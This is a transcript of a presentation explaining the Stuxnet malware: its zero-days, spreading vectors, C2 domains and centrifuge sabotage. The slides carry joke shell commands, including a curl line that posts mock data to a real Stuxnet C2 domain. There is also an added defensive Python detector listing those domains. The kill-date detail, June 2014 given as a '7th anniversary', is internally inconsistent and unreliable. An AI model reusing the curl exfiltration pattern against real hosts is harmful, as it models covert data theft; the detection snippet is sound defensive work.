W32.Stuxnet: How a presumably military-grade malware sabotaged the Iranian nuclear program
Presenter: Dolev Farhi | dolev@dc416.com
Presentation transcript:

W32.Stuxnet: Acknowledgements
Before we start spinning the centrifuges… acknowledgements!

W32.Stuxnet
[root@server ~]# whoami

W32.Stuxnet
[root@server ~]# Stuxnet --help
Stuxnet (W32.Stuxnet) is an advanced malware discovered in 2010 which infected dozens of manufacturing sites, but it seemed to have a particular interest in a very specific geographical location, judging by the malware's characteristics and, later, by the numbers of affected machines reported. Stuxnet specifically attacked industrial control systems, namely Siemens WinCC/PCS7 products running on Windows. To be more specific, it attacked PLCs: the controllers that automate processes such as factory assembly lines and centrifuges (used for the separation of nuclear materials).

W32.Stuxnet
[root@server ~]# history | grep Stuxnet
First identified by VirusBlokAda. It was initially believed that the earliest Stuxnet version dated back to 2009, but Stuxnet 0.5 in fact dates back to late 2005 / early 2006. Stuxnet's release onto the internet was believed to be due to a programming error introduced in one of the ongoing software updates. The first version of Stuxnet closed specific valves, causing pressure to grow 5 times higher than normal. Later versions of Stuxnet changed the frequencies of the motors attached to the PLCs.

W32.Stuxnet
[root@server ~]# Stuxnet --list-zero-days | wc -l
5
The final version of Stuxnet used 4 OS-level zero days in total (2 RCEs and 2 local PEs, i.e. privilege escalations) and 1 application zero day.
[mandatory Buzz Lightyear meme]

W32.Stuxnet: Mode of operation
[root@server ~]# Stuxnet --target uranium4peace.nuclear.ir \
    --dump >> /home/Obama/dailyscripts/log.txt

if os != windows or software != siemens or … or … or …:
    sys.exit(1)
else:
    kaboom()

Stuxnet had a very strict set of requirements that had to be met in order for the payloads to be triggered. Once a machine met the requirements, Stuxnet worked in two different scenes: one attacked the Siemens PLCs, and the other initiated a MiTM inside the PLC (more on that later).
Stuxnet's main targets:
(1) A Windows machine.
(2) One or more Siemens PCS7 PLCs and the WinCC / STEP7 software on that machine; this software provides machinery control in industrial systems.
(3) Nothing else: it did not infect anything that had no value to the operation.

W32.Stuxnet: Siemens WinCC and Simatic S7 PLC
[root@server ~]# man uranium

W32.Stuxnet: How it spreads
[root@server ~]# Oprah.py --generate "You get a zero day"
Stuxnet used multiple spreading vectors:
- Via flash drives (infecting PLCs was not trivial, as they were mostly not connected to the internet), which may indicate the work of double agents or outside contractors.
- Different Stuxnet versions spread in different ways: the most recent one used a Windows LNK hole, while older versions used autorun.inf.
- Stuxnet used vulnerabilities against WinCC (Siemens), Microsoft's spooler service, Microsoft's SMB protocol and Microsoft Windows Server RPC.

W32.Stuxnet: 'Upstream' communication
[root@server ~]# curl --data \
    "location=Iran&mission=spin2death&reason=forthelulz" \
    http://mypremierfutbol.com/
Once Stuxnet infects a relevant machine which matches the strict criteria, it attempts to contact servers in Malaysia and Denmark via HTTP:
www.mypremierfutbol.com
www.todaysfutbol.com
These domain names were registered in 2005 by an unknown source. Stuxnet reported the progress of the spreading process to several command & control servers, which also gave the creators a way of upgrading the software and performing other tasks.
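A defender-side check for the upstream traffic described above, added here as an example and not part of the original presentation: it scans web-proxy log lines for the two C2 domains named on the slide and, separately, for any web request leaving the PLC/HMI network segment, which should never talk to the internet. The log format, the sample lines and the OT subnet (10.50.0.0/16) are constructed assumptions.

```python
# Added example (not from the presentation): scan constructed proxy log lines for
# contacts to the two Stuxnet C2 domains named on the slide, and for any
# internet-bound web request coming from the OT (PLC/HMI) segment.
import ipaddress
from urllib.parse import urlsplit

# The two C2 domains from the slide; "www." hosts are matched as subdomains.
STUXNET_C2_DOMAINS = {"mypremierfutbol.com", "todaysfutbol.com"}

# Assumption: the plant's PLC/HMI segment is 10.50.0.0/16 (a constructed value).
OT_SEGMENT = ipaddress.ip_network("10.50.0.0/16")

# Constructed sample log, one request per line:
# "<timestamp> <src_ip> <method> <url> <status>"
SAMPLE_PROXY_LOG = """\
2010-06-17T08:01:12Z 10.50.3.21 GET http://www.mypremierfutbol.com/index.php 200
2010-06-17T08:01:13Z 10.20.7.5 GET http://intranet.example.local/news 200
2010-06-17T08:02:40Z 10.50.3.21 GET http://www.todaysfutbol.com/index.php 200
2010-06-17T08:03:05Z 10.20.7.9 GET http://updates.example.local/patch.cab 200
2010-06-17T08:04:00Z 10.50.9.2 GET http://news.example.org/ 200
"""


def matches_indicator(host, indicators=STUXNET_C2_DOMAINS):
    """True if host equals an indicator domain or is a subdomain of one."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in indicators)


def scan_proxy_log(text):
    """Return (src_ip, host, reason) findings.

    reason is "known-c2" for a hit on the slide's C2 domains and "ot-egress"
    for any other web request from the OT segment (an anomaly in itself).
    """
    findings = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 5:
            continue  # skip malformed lines rather than crash mid-log
        src, url = parts[1], parts[3]
        host = urlsplit(url).hostname or ""
        if matches_indicator(host):
            findings.append((src, host, "known-c2"))
        elif ipaddress.ip_address(src) in OT_SEGMENT:
            findings.append((src, host, "ot-egress"))
    return findings
```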

W32.Stuxnet: The actual attack
[root@server ~]# Stuxnet --target uranium4peace.nuclear.ir
[root@server ~]# echo $?
[root@server ~]# wall -n mission accomplished comrade
On top of the strict criteria systems had to meet in order for Stuxnet to infect them, it required frequency converter drives to be attached to the PLCs. Stuxnet looked for 2 specific vendors, from Finland and Iran. It attacked systems that spin between 807 Hz and 1210 Hz; once it found them, it manipulated the operation of the motors by changing their rotational speed: it modified the frequency anywhere from 1410 Hz to 2 Hz, all while sending false data back to the operators. It had a logic condition to stop replicating itself on June 24th, 2014 … which happened to be the 7th anniversary of Mahmoud Ahmadinejad's election as president of Iran.

W32.Stuxnet
[root@server ~]# env | grep "Stuxnet\|Malware\|Zero\|Hackers"
It was reported on June 2nd by FireEye that a malware similar to Stuxnet was found, targeting Siemens simulated control system environments and focused on industrial control systems. The malware family was named IronGate.
- MiTMs the PLC and the monitoring software
- Sandbox detection and evasion
- Replaces DLLs and looks for specific processes
- Introduces false data to the operators, similar to Stuxnet
https://www.fireeye.com/blog/threat-research/2016/06/irongate_ics_malware.html

W32.Stuxnet: Interesting read & watch list
(1) Nova: Rise of the Hackers (documentary)
(2) Countdown to Zero Day by Kim Zetter (book)
(*) Zero Days (2016; a movie released this year)